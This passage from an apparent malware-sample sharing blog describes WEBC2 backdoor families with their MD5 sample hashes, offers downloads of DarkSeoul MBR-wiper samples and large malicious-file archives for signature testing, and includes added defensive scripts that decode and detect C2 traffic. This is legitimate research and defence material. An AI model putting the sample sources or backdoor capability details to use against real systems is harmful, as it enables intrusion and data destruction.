It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is capable of downloading and executing a file. All variants represented here are the same file with different MD5 signatures. This malware attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for commands inside a set of HTML tags, part of which are in the File Strings indicator term below.

> WEBC2-ADSPACE_sample_AB00B38179851C8AA3F9BC80ED7BAA23

30. WEBC2-AUSOV

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware family is only a downloader which operates over the HTTP protocol with a hard-coded URL. If directed, it has the capability to download, decompress, and execute compressed binaries.

> WEBC2-AUSOV_sample_6E442C5EF460BEE4C9457C6BF7A132D6
> WEBC2-AUSOV_sample_097B5ABB53A3D84FA9EABDA02FEF9E91
> WEBC2-AUSOV_sample_A40E20FF8B991308F508239625F275D8
> WEBC2-AUSOV_sample_D262CB8267BEB0E218F6D11D6AF9052E

31. WEBC2-BOLID

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.

> WEBC2-BOLID_sample_1EA61A0945BDE3C6F41E12BC01928D37
> WEBC2-BOLID_sample_5FF3269FACA4A67D1A4C537154AAAD4B
> WEBC2-BOLID_sample_53B263DD41838AA178A5CED338A207F3
> WEBC2-BOLID_sample_9675827A495F4BA6A4EFD4DD70932B7C
> WEBC2-BOLID_sample_D8238E950608E5ABA3D3E9E83E9EE2CC
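COOKIEBAG (above) and WEBC2-BOLID both carry their C2 data as single-byte XOR combined with Base64, one in Cookie/Set-Cookie headers, the other between HTML tags. Neither description gives the key, so a triage script has to recover it. The script below is an added example, not code from the Mandiant appendix or from the Contagio archive: it pulls candidate blobs out of cookie headers or out of a chosen tag, Base64-decodes them, and brute-forces the XOR key by scoring each candidate for command-line-looking text. The XOR-then-Base64 order, the demo key 0x5A, the demo plaintext, the HTTP message and the tag name are all assumptions made for the demo.

```python
import base64
import binascii
import re

# Constructed demo values. The page says COOKIEBAG (Cookie/Set-Cookie headers) and
# WEBC2-BOLID (data between HTML tags) combine single-byte XOR with Base64 but does not
# give the key; the key, the plaintext and the XOR-then-Base64 order are assumptions.
DEMO_KEY = 0x5A
DEMO_PLAINTEXT = b"cmd: whoami /all\r\nsleep: 600 seconds\r\n"


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def encode_blob(plaintext: bytes, key: int) -> str:
    """XOR first, then Base64, which keeps the result header-safe ASCII (assumed order)."""
    return base64.b64encode(xor_single_byte(plaintext, key)).decode("ascii")


def extract_cookie_blobs(http_message: str) -> list:
    """Values of every name=value pair in Cookie: / Set-Cookie: headers (COOKIEBAG channel)."""
    blobs = []
    for line in http_message.split("\r\n"):
        m = re.match(r"(?i)(?:set-)?cookie:\s*(.*)$", line)
        if not m:
            continue
        for pair in m.group(1).split(";"):
            if "=" in pair:
                blobs.append(pair.split("=", 1)[1].strip())
    return blobs


def extract_tag_blobs(html: str, tag: str) -> list:
    """Text wrapped in <tag>...</tag> (WEBC2-BOLID channel; the tag name is an assumption)."""
    pattern = rf"<{tag}(?:\s[^>]*)?>(.*?)</{tag}\s*>"
    return [m.strip() for m in re.findall(pattern, html, re.S | re.I)]


def score_plaintext(candidate: bytes) -> int:
    """Plausibility of a decoded command: lowercase/space +2, other printable +1, control -10."""
    score = 0
    for b in candidate:
        if 0x61 <= b <= 0x7A or b == 0x20:
            score += 2
        elif 0x20 < b < 0x7F or b in (9, 10, 13):
            score += 1
        else:
            score -= 10
    return score


def brute_force_blob(blob: str) -> list:
    """Base64-decode, then try all 256 XOR keys; returns [(score, key, plaintext)], best first."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return []  # not Base64 at all, e.g. an ordinary session cookie
    results = []
    for key in range(256):
        plaintext = xor_single_byte(raw, key)
        results.append((score_plaintext(plaintext), key, plaintext))
    results.sort(key=lambda r: (-r[0], r[1]))
    return results


def best_decode(blob: str):
    """(key, plaintext) for the most plausible key, or None when the blob is not Base64."""
    results = brute_force_blob(blob)
    return (results[0][1], results[0][2]) if results else None


if __name__ == "__main__":
    blob = encode_blob(DEMO_PLAINTEXT, DEMO_KEY)
    # Constructed C2 reply: the same blob once in a Set-Cookie header, once between <b> tags.
    reply = ("HTTP/1.1 200 OK\r\nSet-Cookie: SESSIONID=" + blob + "; path=/\r\n"
             "Content-Type: text/html\r\n\r\n<html><b>" + blob + "</b></html>")
    body = reply.split("\r\n\r\n", 1)[1]
    for candidate in extract_cookie_blobs(reply) + extract_tag_blobs(body, "b"):
        print(candidate[:24] + "...", "->", best_decode(candidate))
```

The scoring deliberately favours lowercase letters and spaces over other printable bytes: a wrong key that only flips the low bits of the plaintext (for example 0x07 off the real key) still yields letters, but turns every space into punctuation, so the true key wins. Run the brute force over every cookie value and tag body in a proxy capture and review the top candidates by hand; ordinary session cookies fail Base64 validation and drop out early.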
32. WEBC2-CLOVER

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The family of malware provides the attacker with an interactive command shell, the ability to upload and download files, execute commands on the system, list processes and DLLs, kill processes, and ping hosts on the local network. Responses to these commands are encrypted and compressed before being POSTed to the server. Some variants copy cmd.exe to Updatasched.exe in a temporary directory, and then may launch that in a process if an interactive shell is called. On initial invocation, the malware also attempts to delete previous copies of the Updatasched.exe file.

> WEBC2-CLOVER_sample_2FCCAA39533DE02490B1C6395878DD79
> WEBC2-CLOVER_sample_29C691978AF80DC23C4DF96B5F6076BB
> WEBC2-CLOVER_sample_065E63AFDFA539727F63AF7530B22D2F

33. WEBC2-CSON

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware act only as downloaders and droppers for other malware. They communicate with a hard-coded C2 server, reading commands embedded in HTML comment fields. Some variants are executables which act upon execution, others are DLLs which can be attached to services or loaded through search order hijacking.
> WEBC2-CSON_sample_7D3140BD028F70F1FA865364B69C5999
> WEBC2-CSON_sample_50F35B7C86AEDE891A72FCB85F06B0B7
> WEBC2-CSON_sample_73D125F84503BD87F8142CF2BA8AB05E
> WEBC2-CSON_sample_575836EBB1B8849F04E994E9160370E4
> WEBC2-CSON_sample_4192479B055B2B21CB7E6C803B765D34
> WEBC2-CSON_sample_277964807A66AEEB6BD81DBFCAA3E4E6
> WEBC2-CSON_sample_A38A367D6696BA90B2E778A5A4BF98FD
> WEBC2-CSON_sample_D22863C5E6F098A4B52688B021BEEF0A
> WEBC2-CSON_sample_F1E5D9BF7705B4DC5BE0B8A90B73A863
> WEBC2-CSON_sample_F802B6E448C054C9C16B97FF85646825

34. WEBC2-DIV

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-DIV variant searches for the strings "div safe:" and " balance" to delimit encoded C2 information. If the decoded string begins with the letter "J" the malware will parse additional arguments in the decoded string to specify the sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading and executing a file, or sleeping a specified interval.

> WEBC2-DIV_sample_1E5EC6C06E4F6BB958DCBB9FC636009D

35. WEBC2-GREENCAT

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware is a variant on the GREENCAT family, using a fixed web C2. This family is a full-featured backdoor which provides remote command execution, file transfer, process and service enumeration and manipulation. It installs itself persistently through the current user's registry Run key.
> WEBC2-GREENCAT_sample_1CE4605E771A04E375E0D1083F183E8E
> WEBC2-GREENCAT_sample_36C0D3F109AEDE4D76B05431F8A64F9E
> WEBC2-GREENCAT_sample_55FB1409170C91740359D1D96364F17B
> WEBC2-GREENCAT_sample_BA0C4D3DBF07D407211B5828405A9B91
> WEBC2-GREENCAT_sample_E54CE5F0112C9FDFE86DB17E85A5E2C5
> WEBC2-GREENCAT_sample_E83F60FB0E0396EA309FAF0AED64E53F

36. WEBC2-HEAD

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-HEAD variant communicates over HTTPS, using the system's SSL implementation to encrypt all communications with the C2 server. WEBC2-HEAD first issues an HTTP GET to the host, sending the Base64-encoded string containing the name of the compromised machine running the malware.

> WEBC2-HEAD_sample_7B42B35832855AB4FF37AE9B8FA9E571
> WEBC2-HEAD_sample_88C7C50CD4130561D57A1D3B82C5B953
> WEBC2-HEAD_sample_165EF79E7CAA806F13F82CC2BBF3DEDD
> WEBC2-HEAD_sample_649D54BC9EEF5A60A4B9D8B889FEE139
> WEBC2-HEAD_sample_973F4A238D6D19BDC7B42977B07B9CEF
> WEBC2-HEAD_sample_B74022A7B9B63FDC541AE0848B28A962
> WEBC2-HEAD_sample_C4C638750526E28F68D6D71FD1266BDF
> WEBC2-HEAD_sample_C9172B3E83C782BC930C06B628F31FA5
> WEBC2-HEAD_sample_EC8C89AA5E521572C74E2DD02A4DAF78
> WEBC2-HEAD_sample_F627990BBE2EC5C48C180F724490C332

37. WEBC2-KT3

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-KT3 variant searches for commands in a specific comment tag. Network traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity.

> WEBC2-KT3_sample_EC3A2197CA6B63EE1454D99A6AE145AB

38. WEBC2-QBP

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server.
It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-QBP variant will search for two strings in an HTML comment. The first will be "2010QBP " followed by " 2010QBP//--". Inside these tags will be a DES-encrypted string.

> WEBC2-QBP_sample_929802A27737CEBC59D19DA724FDF30A
> WEBC2-QBP_sample_C04C796EF126AD7429BE7D55720FE392
> WEBC2-QBP_sample_CF9C2D5A8FBDD1C5ADC20CFC5E663C21

39. WEBC2-RAVE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware will set itself up as a service and connect out to a hardcoded web page and read a modified base64 string from this webpage. The later versions of this malware support three commands (earlier ones are just downloaders or reverse shells). The first command will sleep the malware for N hours. The second command will download a binary from the encoded HTML comment and execute it on the infected host. The third will spawn an encoded reverse shell to an attacker-specified location and port.

> WEBC2-RAVE_sample_5BCAA2F4BC7567F6FFD5507A161E221A
> WEBC2-RAVE_sample_9F11BC08AF048C5C3A110E567082FE0B
> WEBC2-RAVE_sample_438983192903F3FECF77500A39459EE6
> WEBC2-RAVE_sample_A2534E9B7E4146368EA3245381830EB0
> WEBC2-RAVE_sample_BDD2AD4C0E1E5667D117810AE9E36C4B
> WEBC2-RAVE_sample_BF0EE4367EA32F8E3B911C304258E439

40. WEBC2-TABLE

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for 'background', 'align', and 'bgcolor' tags to be present in the requested Web page.
If the data in these tags is formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

> WEBC2-TABLE_sample_7A7A46E8FBC25A624D58E897DEE04FFA

41. WEBC2-TOCK

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TOCK variant looks for tags which include the name of the system in them as a parameter. If those tags are formed correctly, the malware will decode the payload URL from the web page, then download and execute the payload.

No samples.

42. WEBC2-UGX

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware provide remote command shell and remote file download and execution capabilities. The malware downloads a web page containing a crafted HTML comment that subsequently contains an encoded command. The contents of this command tell the malware whether to download and execute a program, launch a reverse shell to a specific host and port number, or sleep for a period of time.

> WEBC2-UGX_sample_4B19A2A6D40A5825E868C6EF25AE445E
> WEBC2-UGX_sample_54D5D171A482278CC8EACF08D9175FD7
> WEBC2-UGX_sample_56DE2854EF64D869B5DF7AF5E4EFFE3E
> WEBC2-UGX_sample_75DAD1CCABAE8ADEB5BAE899D0C630F8
> WEBC2-UGX_sample_8462A62F13F92C34E4B89A7D13A185AD

43. WEBC2-Y21K

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of backdoor malware talk to specific Web-based Command & Control (C2) servers.
The backdoor has a limited command set, depending on version. It is primarily a downloader, but it is classified as a backdoor because it can accept a limited command set, including changing local directories, downloading and executing additional files, sleeping, and connecting to a specific IP & port not initially included in the instruction set for the malware. Each version of the malware has at least one hardcoded URL to which it connects to receive its initial commands. This family of malware installs itself as a service, with the malware either being the executable run by the service, or the service DLL loaded by a legitimate service. The same core code is seen recompiled on different dates or with different names, but with the same functionality. Key signatures include a specific set of functions (some of which can be used with the OS-provided rundll32.exe tool to install the malware as a service), and hardcoded strings used in communication with C2 servers to issue commands to the implant.

> WEBC2-Y21K_sample_4CABFAEF26FD8E5AEC01D0C4B90A32F3
> WEBC2-Y21K_sample_225E33508861984DD2A774760BFDFC52
> WEBC2-Y21K_sample_2479A9A50308CB72FCD5E4E18EF06468

44. WEBC2-YAHOO

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to download a web page that may contain an encoded URL. The encoded URL will be found in the pages returned inside an attribute named 'sb' or 'ex' within a tag named 'yahoo'. The embedded link can direct the malware to download and execute files.
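Several of the WEBC2 entries above say where the command data sits in the retrieved page: between "div safe:" and " balance" (WEBC2-DIV), inside an HTML comment between "2010QBP " and " 2010QBP//--" (WEBC2-QBP), in a comment starting with *!Kt3+v| (WEBC2-KT3), in the 'sb' or 'ex' attribute of a 'yahoo' tag (WEBC2-YAHOO), and in a tag carrying 'background', 'align' and 'bgcolor' (WEBC2-TABLE); CSON, UGX and RAVE read encoded commands from HTML comments. The scanner below is an added example, not code from the Mandiant report or from the samples, that runs over a fetched page or a proxy log body and pulls out those carriers. The regular expressions approximate the delimiters as the descriptions word them (exact spacing and comment syntax in real samples are assumptions), and the sample page and its encoded values are constructed. The page gives neither the decoding routines nor QBP's DES key, so the scanner only locates and extracts the encoded payloads.

```python
import re

# The delimiters below follow the Mandiant descriptions of each WEBC2 variant as worded
# in this list; exact spacing and comment syntax in real samples are assumptions.
WEBC2_DELIMITERS = {
    "WEBC2-DIV": re.compile(r"div safe:(.*?) balance", re.S),
    "WEBC2-QBP": re.compile(r"2010QBP (.*?) 2010QBP//--", re.S),  # DES-encrypted; key not on page
    "WEBC2-KT3": re.compile(r"<!--\s*(\*!Kt3\+v\|.*?)\s*-->", re.S),
}
YAHOO_TAG = re.compile(r"<yahoo\b([^>]*)>", re.I)
YAHOO_ATTR = re.compile(r"""\b(?:sb|ex)\s*=\s*["']?([^"'\s>]+)""", re.I)
ANY_TAG = re.compile(r"<(\w+)\b([^>]*)>")
TABLE_ATTRS = ("background", "align", "bgcolor")
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def scan_webc2_page(html: str) -> list:
    """Locate WEBC2 command carriers in a page body; returns [{'variant', 'payload'}, ...]."""
    hits = []
    for variant, pattern in WEBC2_DELIMITERS.items():
        for m in pattern.finditer(html):
            hits.append({"variant": variant, "payload": m.group(1).strip()})
    for tag in YAHOO_TAG.finditer(html):            # WEBC2-YAHOO: <yahoo sb=... ex=...>
        for attr in YAHOO_ATTR.finditer(tag.group(1)):
            hits.append({"variant": "WEBC2-YAHOO", "payload": attr.group(1)})
    for tag in ANY_TAG.finditer(html):              # WEBC2-TABLE: all three attributes on one tag
        attrs = tag.group(2).lower()
        if all(re.search(rf"\b{name}\s*=", attrs) for name in TABLE_ATTRS):
            hits.append({"variant": "WEBC2-TABLE", "payload": tag.group(2).strip()})
    return hits


def suspicious_comments(html: str) -> list:
    """HTML comments whose whole body is one Base64-looking token (CSON/UGX/RAVE style carriers)."""
    return [body.strip() for body in HTML_COMMENT.findall(html)
            if BASE64_TOKEN.fullmatch(body.strip())]


# Constructed page exercising every marker; the encoded values are made up for the demo.
DEMO_HTML = """<html><head><title>news</title></head><body>
<!-- 2010QBP 8f3a2c1d9e0b7a6c 2010QBP//-->
<div>div safe:aGVsbG8gd29ybGQ= balance</div>
<yahoo sb="aHR0cDovL2V4YW1wbGUuaW52YWxpZC9hLmV4ZQ=="></yahoo>
<!-- *!Kt3+v|c2NyZWVu -->
<table background="i.gif" align="center" bgcolor="#ffffff"></table>
<!-- QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo= -->
<!-- plain author note -->
</body></html>"""


if __name__ == "__main__":
    for hit in scan_webc2_page(DEMO_HTML):
        print(hit["variant"], "->", hit["payload"])
    print("base64-only comments:", suspicious_comments(DEMO_HTML))
```

Feed it the response bodies of suspicious periodic GETs (the ten-minute YAHOO loop, the weekly Thursday ADSPACE check-in) and the hits tell you which variant's decoder to reach for; the generic comment check is noisy on real sites, so treat it as a lead rather than a verdict.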
> WEBC2-YAHOO_sample_2B659D71AE168E774FAAF38DB30F4A84
> WEBC2-YAHOO_sample_4C9C9DBF388A8D81D8CFB4D3FC05F8E4
> WEBC2-YAHOO_sample_7A670D13D4D014169C4080328B8FEB86
> WEBC2-YAHOO_sample_36D5C8FC4B14559F73B6136D85B94198
> WEBC2-YAHOO_sample_37DDD3D72EAD03C7518F5D47650C8572
> WEBC2-YAHOO_sample_0149B7BD7218AAB4E257D28469FDDB0D
> WEBC2-YAHOO_sample_1415EB8519D13328091CC5C76A624E3D
> WEBC2-YAHOO_sample_A8F259BB36E00D124963CFA9B86F502E
> WEBC2-YAHOO_sample_AA4F1ECC4D25B33395196B5D51A06790
> WEBC2-YAHOO_sample_CC3A9A7B026BFE0E55FF219FD6AA7D94
> WEBC2-YAHOO_sample_F7F85D7F628CE62D1D8F7B39D8940472

DARKSEOUL - JOKRA - MBR WIPER SAMPLES
March 20, 2013, 9:29 pm

If all you needed for happiness is to destroy a few virtual machines, here are the samples for today's headline maker. The malware overwrites the master boot record (MBR) as described here:

* Trojan.Jokra - Symantec
* DarkSeoul: SophosLabs identifies malware used in South Korean internet attack
* South Korean Banks, Media Companies Targeted by Destructive Malware - McAfee
* South Korean Banks and Broadcasting Organizations Suffer Major Damage from Cyber Attack - Symantec

Download
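When a sample like this has run in a VM, the first question is usually whether the first sector survived. The following is an added example for this page, not code from the post or from the vendor write-ups linked above, and it does not model any particular wiper's fill pattern: it reads the 512-byte MBR from a raw image and checks the things an overwrite almost always breaks (the 0x55AA boot signature at offset 510, the status bytes of the four partition entries at offset 446, and the byte diversity of the boot code area). The intact and wiped sectors it runs on are constructed.

```python
"""First-sector sanity check for a disk image pulled after a suspected MBR
wiper run. Added example; not code from this post or from the vendor write-ups
linked above, and it does not model any specific wiper's fill pattern. It
checks what an overwritten sector almost always breaks: the 0x55AA boot
signature at offset 510 and the four 16-byte partition entries at offset 446,
whose status byte must be 0x00 (inactive) or 0x80 (bootable)."""
import struct

SECTOR = 512
PT_OFFSET = 446
SIG_OFFSET = 510


def parse_partitions(sector):
    """Return the four partition entries as dicts (status, type, lba, sectors)."""
    entries = []
    for i in range(4):
        e = sector[PT_OFFSET + 16 * i:PT_OFFSET + 16 * (i + 1)]
        status, ptype = e[0], e[4]
        lba, count = struct.unpack_from("<II", e, 8)
        entries.append({"status": status, "type": ptype, "lba": lba, "sectors": count})
    return entries


def check_mbr(sector):
    """Return a list of findings; an empty list means the sector looks intact."""
    if len(sector) != SECTOR:
        return [f"expected {SECTOR} bytes, got {len(sector)}"]
    findings = []
    if sector[SIG_OFFSET:SIG_OFFSET + 2] != b"\x55\xaa":
        findings.append("boot signature 0x55AA missing")
    parts = parse_partitions(sector)
    for i, p in enumerate(parts):
        if p["status"] not in (0x00, 0x80):
            findings.append(f"partition {i}: invalid status byte 0x{p['status']:02x}")
        if p["type"] and p["sectors"] == 0:
            findings.append(f"partition {i}: type 0x{p['type']:02x} but zero length")
    if not any(p["type"] for p in parts):
        findings.append("no partition entries at all")
    # A sector filled with a repeating string or a constant has almost no
    # distinct byte values in the 446-byte boot code area; real boot code does.
    if len(set(sector[:PT_OFFSET])) <= 8:
        findings.append("boot code area has almost no byte diversity (overwritten?)")
    return findings


def check_image(path):
    """Run check_mbr on the first sector of a raw disk image or block device."""
    with open(path, "rb") as f:
        return check_mbr(f.read(SECTOR))


def build_intact_mbr():
    """Constructed, minimal but well-formed MBR: one bootable NTFS-type partition."""
    sector = bytearray(SECTOR)
    sector[:PT_OFFSET] = bytes(range(256)) + bytes(range(190))   # stand-in boot code
    sector[PT_OFFSET:PT_OFFSET + 16] = struct.pack(
        "<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 2048, 409600)
    sector[SIG_OFFSET:] = b"\x55\xaa"
    return bytes(sector)


def build_wiped_mbr(fill=b"WIPED!!!"):
    """Constructed stand-in for a sector overwritten with a repeating string."""
    return (fill * (SECTOR // len(fill) + 1))[:SECTOR]


if __name__ == "__main__":
    print("intact:", check_mbr(build_intact_mbr()))
    print("wiped: ", check_mbr(build_wiped_mbr()))
```

This is a plausibility check, not proof of integrity: a wiper that preserves the signature and partition table while trashing the boot code would pass it. The stronger check is a byte-for-byte comparison of the first sector against a pre-infection snapshot of the same VM, which `check_image` can be extended to do once a known-good copy exists.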
Email me if you need the password.

Download dc789dee20087c5e1552804492b042cd (linux shell script)

File Information

9263E40D9823AECF9388B64DE34EAE54 DarkSeoulDropper
dc789dee20087c5e1552804492b042cd linux shell script
5FCD6E1DACE6B0599429D913850F0364
0A8032CD6B4A710B1771A080FA09FB87
DB4BBDC36A78A8807AD9B15A562515C4
F0E045210E3258DAD91D7B6B4D64E7F3
E4F66C3CD27B97649976F6F0DAAD9032 (Oct 19, 2012) - older sample
50E03200C3A0BECBF33B3788DAC8CD46 (Aug 30, 2012) - older sample

Automatic Scans

SHA256: 422c767682bee719d85298554af5c59cf7e48cf57daaf1c5bdd87c5d1aab40cc
SHA1: bf823cfee2b2072efb7fed11898eb235e2b3c1ed
MD5: 9263e40d9823aecf9388b64de34eae54
File size: 417.5 KB (427520 bytes)
File type: Win32 EXE
Tags: peexe upx
Detection ratio: 14 / 45
Analysis date: 2013-03-21 01:23:59 UTC

AhnLab-V3 Dropper/Eraser.427520 20130320
AntiVir TR/KillMBR.Y.2 20130320
Commtouch W32/Warezov.gen2!W32DL 20130320
DrWeb Trojan.KillFiles.10563 20130321
F-Prot W32/Warezov.gen2!W32DL 20130321
Microsoft Trojan:Win32/Dembr.A 20130320
NANO-Antivirus Virus.Win32.Gen.ccmw 20130321
nProtect Trojan/W32.Agent.427520.EJ 20130320
PCTools Trojan.Jokra 20130321
Symantec Trojan.Jokra 20130321
TrendMicro-HouseCall TROJ_GEN.F47V0320 20130321
VBA32 BScope.Trojan.MTA.0161 20130320
ViRobot Dropper.S.Agent.427520.A 20130320

SHA256: 239ed753232d3cc0e75323d16d359150937934d30da022628e575997c8dd60a2
SHA1: 9f69da40dda6367789041aaff01cf61d562b7c21
MD5: 5fcd6e1dace6b0599429d913850f0364
File size: 24.0 KB (24576 bytes)
File name: 239ed753232d3cc0e75323d16d359150937934d30da022628e575997c8dd60a2
File type: Win32 EXE
Tags: peexe
Detection ratio: 16 / 45
Analysis date: 2013-03-21 00:33:17 UTC

AhnLab-V3 Win-Trojan/Agent.24576.JPG 20130320
AntiVir TR/KillMBR.Y.1 20130320
ClamAV Win.Trojan.Agent-257543 20130320
DrWeb Trojan.KillFiles.10563 20130321
Fortinet W32/Pak.ACED1!tr 20130320
Malwarebytes Trojan.MBR.Killer 20130320
McAfee KillMBR-FBIA 20130320
McAfee-GW-Edition Artemis!5FCD6E1DACE6 20130320
NANO-Antivirus Virus.Win32.Gen.ccmw 20130320
nProtect Trojan/W32.Agent.24576.EAO 20130320
PCTools Trojan.Jokra 20130321
Sophos Mal/EncPk-ACE 20130320
Symantec Trojan.Jokra 20130321
TrendMicro TROJ_INJECTO.BDE 20130320
TrendMicro-HouseCall TROJ_INJECTO.BDE 20130321
ViRobot Trojan.Win32.U.KillMBR.24576.A 20130320

16,800 CLEAN AND 11,960 MALICIOUS FILES FOR SIGNATURE TESTING AND RESEARCH.
March 23, 2013, 11:02 pm

Signature and security product testing often requires large numbers of sorted malicious and clean files to eliminate false positives and negatives. They are not always easy to find, but here are some that I have. Clean documents are collected from various open sources. All copyright rights belong to the authors of each document and file. You must not use the documents for their content but only as samples of particular file types.

Download all

All files use the same password (scheme). Email me if you need the password.

16,800 CLEAN FILES
1. EXE - UTILITY FOR CLEAN EXE FILES
2. XLS(X), DOC(X), RTF - CLEAN MS OFFICE FILES AND RTF - 2000 FILES
3. ZIP, 7Z, RAR - CLEAN ARCHIVE FILES - 5500 FILES
4. JAR - CLEAN JAVA FILES - 100 FILES
5. PDF - PDF - 9000_files and PDF -100+with embed_3d_video_swf_ js
6. MACH-O - CLEAN OSX MACH-O FILES - 50 FILES
7. ELF - CLEAN ELF LINUX FILES - 46 FILES

11,960 MALICIOUS FILES
1. PDF - MALWARE PDF NEW -170 FILES; MALWARE PDF PRE_04-2011_10982_files
2. RTF, XLS - MALWARE RTF_CVE-2010-3333_RTF_92files; MALWARE_RTF_CVE-2012-0158_300_files; MALWARE_ENCRYPTED_XLS_16files
3. MACH-O - MALWARE_MACHO_OSX_100_FILES
4. ELF - MALWARE_ELF_LINUX_100_FILES
5. JAR - MALWARE JAVA (JAR) - 200 FILES

DETAILED LISTING OF CLEAN FILES

1.
WINDOWS EXECUTABLES (EXE)
Windows executables. I am not posting any because you can quickly generate your own from any VM. See the exe collect utility by Stephan Chenette: https://github.com/IOActive/SearchAndCollect

2. CLEAN MS OFFICE FILES AND RTF - 2,000 FILES (DOC, DOCX, XLS, XLSX, RTF)
RTF - 200_files
XLSX -100_files
XLS_300_files
DOCX_100_files
DOC_1300_files

3. CLEAN ARCHIVE FILES - 5,500 FILES (7z, ZIP, RAR; encrypted and not)
7z_w_EXE+DLL_1000_files_nopass
RAR_EXE+DLL_1000_files_encryptedname_pass_123qwe
RAR_EXE+DLL_1000_files_pass_password123
RAR_OFFICE+PDF_500_files_pass_1234!@#$
ZIP_w_EXE+DLL_1000_files_nopass
ZIP_w_EXE+DLL_1000_files_pass_password123

P.S. - please remove _185-1 (86).rar from RAR_OFFICE+PDF_500_files_pass_1234!@#$ as it is not clean; it sneaked in by accident. It has already been removed from the current set.

4. CLEAN JAVA FILES - 100 FILES (JAR)
CLEAN_JAR_100_files

5. CLEAN ADOBE READER FILES - 9,100 FILES (PDF)
PDF - 9000_files
PDF -100+__embed_3d_video_swf_ js - clean PDF documents with special features: embedded JavaScript, 3D objects, Flash, video, etc.

6. CLEAN OSX MACH-O FILES - 50 FILES

7. CLEAN ELF LINUX FILES - 46 FILES
These 4 files were removed as questionable (perl2elf utility with obfuscated Perl code):
0fdb34f48166dae57ff410d723efd3f7
4020b92f05661260f5ed3fe642eb0ace
a1faa486be2303697d13d26cca576f27
f7536bb412d6c4573fd6fd819e1b07bb

DETAILED LISTING OF MALICIOUS FILES

1. MALWARE ADOBE READER FILES - 11,152 FILES (PDF)
PDF-XDP _3files
CVE-2013-0640_PDF_21files
CVE-2012-0754_PDF_1file
CVE-2011-2462_PDF_25files
CVE-2010-0188_PDF_49files
CVE_2010-2883_PDF_25files
MALWARE_PDF_PRE_04-2011_10982_files - files from web exploit packs, older than April 2011

2. MALWARE MS OFFICE AND RTF FILES (RTF, XLS)
MALWARE RTF_CVE-2010-3333_RTF_92files
MALWARE_RTF_CVE-2012-0158_300_files
MALWARE_ENCRYPTED_XLS_16files - CVE-2012-0158

3. MALWARE_MACHO_OSX_100_FILES

4. MALWARE_ELF_LINUX_100_FILES

5.
MALWARE JAVA (JAR) - 200 FILES

CVE-2013-0804 NOVELL GROUPWISE 2012 MULTIPLE UNTRUSTED POINTER DEREFERENCES EXPLOITATION BY BRIAN MARIANI & FRÉDÉRIC BOURLA
April 16, 2013, 9:55 pm

This is another excellent publication by Brian Mariani & Frédéric Bourla (High Tech Bridge) describing their discovery and research of CVE-2013-0804, Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation.

CVE-2013-0804: The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before SP1 HP1 allows remote attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference) via unspecified vectors.

You can download it from here: High Tech Bridge - Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation by Brian Mariani & Frédéric Bourla

CVE-2013-0640 SAMPLES LISTING
April 23, 2013, 9:42 pm

This is a detailed MD5 listing of the CVE-2013-0640 PDF files that were posted earlier. I got a few requests for samples that were already posted as a pack in this post (16,800 clean and 11,960 malicious files for signature testing and research). Now you can see them in all their glory below. I can post listings for other malware from that large post if there is need and interest.

References:
